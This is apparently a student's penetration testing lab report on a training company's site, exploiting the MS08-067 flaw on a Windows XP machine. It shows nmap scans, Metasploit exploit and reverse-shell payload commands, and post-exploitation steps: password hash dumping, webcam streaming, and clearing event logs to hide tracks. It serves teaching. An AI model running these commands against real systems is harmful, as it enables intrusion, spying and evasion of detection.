Vulnerability Assessment & Penetration Testing Report | ICSS Student – Vivek Kumar

Vulnerability Assessment & Penetration

Testing Report 

[on Windows XP]

Vulnerability is a cyber-security term that refers to a flaw in a system that can leave it open to attack. A vulnerability may also refer to any type of weakness in a computer system itself, in a set of procedures, or in anything that leaves information security exposed to a threat.

Vulnerability Assessment & Penetration Testing Report done by ICSS Student Vivek Kumar. The full project discussed below:

 

Project Name: Vulnerability AssessmentPenetration testing

Author Name: Vivek Kumar

Publish Date:  24-07-2018

 

Table of  Contents

 

Reconnaissance

Vulnerability Scanning

Attack and Penetration

Post-Exploitation

Solution & Recommendation

 

 

Reconnaissance

 

The first part of VAPT is information gathering about the target network or machine. In our case the target is a windows xp 2003 machine which is on the same network as me.

So at first we will run a nmap scan to see the live hosts.

 

Vulnerability

 

Now we need to seperae out the live ip address so we will save the above result in a text file and then filter the ip address using the command –

nmap -sV -sP 192.168.31.1-255 > host.txt cat host.txt | grep “for” | cut -d “ “ -f5 > ip.txt The output is :

 

command

 

Now we have to check which one of them is a windows xp machine so we will run an script which will detect the os of all the live ip’s.

nmap -sV -O -iL ip.txt > os.txt

 

and the output is :

 

Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-16 23:55 IST Nmap scan report for XiaoQiang (192.168.31.1)

Host is up (0.0013s latency). Not shown: 995 closed ports

PORT     STATE SERVICE VERSION

53/tcp   open domain dnsmasq 2.71 80/tcp   open http    nginx (bad gateway) 8192/tcp open http                       Tengine httpd 8193/tcp open http                            nginx

8899/tcp open http    Tengine httpd

MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=7/16%OT=53%CT=1%CU=40355%PV=Y

%DS=1%DC=D%G=Y%M=7811DC%T OS:M=5B4CE349%P=i686-pc-linux- gnu)SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%II=I%TS=7)

OS:OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11 NW7%O4=M5B4ST11NW7%O5=M5B4 OS:ST11NW7%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890

%W4=3890%W5=3890%W6=3890) OS:ECN(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW7%CC=N% Q=)T1(R=Y%DF=Y%T=40%S=A%A=S+% OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0

%S=A%A=Z%F=R%O=%RD=0%Q=)T OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q

=)T6(R=Y%DF=Y%T=40%W=0%S=A%A= OS:Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=1 64%UN=0%RIPL=G%RID=G%RIPCK OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

 

Network Distance: 1 hop

 

Nmap scan report for 192.168.31.44

 

Host is up (0.041s latency). Not shown: 999 closed ports

PORT   STATE SERVICE VERSION

22/tcp open ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

MAC Address: F2:03:71:B7:A4:27 (Unknown) Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.12 – 4.10

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

Nmap scan report for 192.168.31.112 Host is up (0.017s latency).

All 1000 scanned ports on 192.168.31.112 are closed

MAC Address: 64:CC:2E:96:75:69 (Xiaomi Communications) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop

 

Nmap scan report for 192.168.31.224 Host is up (0.042s latency).

Not shown: 996 closed ports

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 2869/tcp open http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP) MAC Address: F2:03:71:B7:A4:27 (Unknown)

Device type: general purpose

Running: Microsoft Windows XP|2003

OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003

OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003

Network Distance: 1 hop

Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

 

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 5 IP addresses (4 hosts up) scanned in 60.99 seconds

 

The machine details marked in yellow is our target machine.

 

1 hop

 

Now with our target locked we will move to the next step.

 

Vulnerability Scanning

 

In this part we will scan the target for known vulerabilities so again we will use nmap to run a script which wil detect vulnerbility in the system.

 

nmap -Pn –script vuln 192.168.31.224 > vuln.txt The output is :

 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-16 14:12 IST Nmap scan report for 192.168.31.224

Host is up (0.0022s latency). Not shown: 996 closed ports PORT STATE SERVICE

135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2869/tcp open icslap

 

Host script results:

|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

| smb-vuln-ms08-067:

|   VULNERABLE:

|   Microsoft Windows system vulnerable to remote code execution (MS08- 067)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2008-4250

|            The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,

|            Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary

|            code via a crafted RPC request that triggers the overflow during path canonicalization.

|

|     Disclosure date: 2008-10-23

|     References:

|        https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

 

|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

|_smb-vuln-ms10-054: false

|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

| smb-vuln-ms17-010:

|   VULNERABLE:

|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

|     State: VULNERABLE

|     IDs: CVE:CVE-2017-0143

|     Risk factor: HIGH

|       A critical remote code execution vulnerability exists in Microsoft SMBv1

|         servers (ms17-010).

|

|     Disclosure date: 2017-03-14

|     References:

|        https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer- guidance-for-wannacrypt-attacks/

|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds

 

 

The above result shows the list of vulnerabilities which are marked in yellow and they are as follows :

 

|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

 

This vulnerability exist but it doesn’t provide any user access so it can’t be used. The next one is

 

smb-vuln-ms08-067: This vulnerability allows user to have remote access to the target system and it exist on windows xp 2003 machine which is our target.

Then the last one listed is smb-vuln-ms17-010:

 

This vulnerability also allows users to have remote access to the target system but it is not available for the windows xp 2003 machine it only exists in windows servers .

 

So now we will use the ms08_067 vulnerability to exploit the machine using Metasploit.

 

Attack and Penetration

 

To perform this attack we will use msfconsole. Metasploit framework has a huge collection of exploits,paylods and modules which are used by the hacking community.

 

So it can launched by typing msfconsle in the terminal.

 

Now we have search for the ms08_067 vulnerability. So we will type search ms08_067

 

Metasloit framework

 

The following commands will follow

 

use exploit/windows/smb/ms08_067_netapi show payloads

it will show a list of payloads which can be used to perform the attack. We are going to use windows/meterpreter/reverse_tcp payload

 

set payload windows/meterpreter/reverse_tcp

 

show options

set rhost 192.168.31.224  (target ip address) set lhost 192.168.31.44                                             (attacker ip address)

 

 

payload

 

The final command to execute the attack is exploit

 

attack

 

 

Post-Exploitation

 

Once we get a meterpreter session we own the target machine now we can do any thing we want like we can escalete privilage by the command

getsystem

To conform check the ip by typing ifconfig

 

meterpreter

 

we have a lot of options which we can get by typing help most common ones are

getsystem sysinfo getuid hashdump

webcam_stream download

cd ls

reboot

 

At last we need to clear our footprints using command clearev

 

 

Solution & Recommendation

 

This particular vulnerability was patched and released by the microsoft a long ago so just perform an windows update and this vulnerability will be atomatically patched.

 

One should always keep his/her system and progams updated .

This habit alone can give you a lot of protection as the latest updated softwares are unlikely to have any known vulnerability.

 

Also the windows xp pack is very old so user should upgrade to the latest os which is windows 10 . A good antivirus should be used and it should be upgraded regularly . Firewall should be kept on. Contact a professional to perform regular checks.

 

See the full process in video given below:

 

 

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Internet Of Things Training Hyderabad

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad


Show Buttons
Hide Buttons